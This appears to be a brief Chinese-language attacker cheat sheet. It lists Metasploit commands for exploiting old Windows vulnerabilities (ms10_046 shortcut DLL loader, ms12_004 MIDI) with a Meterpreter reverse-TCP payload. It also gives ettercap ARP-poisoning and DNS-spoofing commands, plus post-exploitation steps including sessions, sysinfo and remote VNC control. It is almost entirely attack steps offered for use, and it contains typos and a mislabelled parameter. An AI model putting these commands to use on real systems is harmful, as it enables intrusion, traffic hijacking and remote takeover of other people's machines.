ms12_020蓝屏 ms12_063
metasplot ms10_046漏洞使用
ms12_004 use exploit/windwos/browser/ms12_004_midi
首先启动msf
msfconsole #打开msf
<p>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader #使用攻击模块</p><p>set SRVHOST ip #设置目标ip</p><p>set LHOST ip #设置本地ip</p><p>set PAYLOAD windows/meterpreter/reverse_tcp #设置攻击载荷</p><p>exploit #利用</p>
<p>/usr/local/share/ettercap/etter.dns #修改dns</p><p>ettercap -T -q -i interface -P dns_spoof #进行dns欺骗配置</p><p>ettercap -T -Q -i interface -M arp -P dns_spoof #开始</p>
show targets 查看所能溢出的系统版本
set target 1 设置系统版本
show options 展示没有配置的参数
查看模块支持的版本并设置show targets
sessions 查看会话
sessions -i 1
sysinfo
run vnc 开远程控制
exploit -f
| 
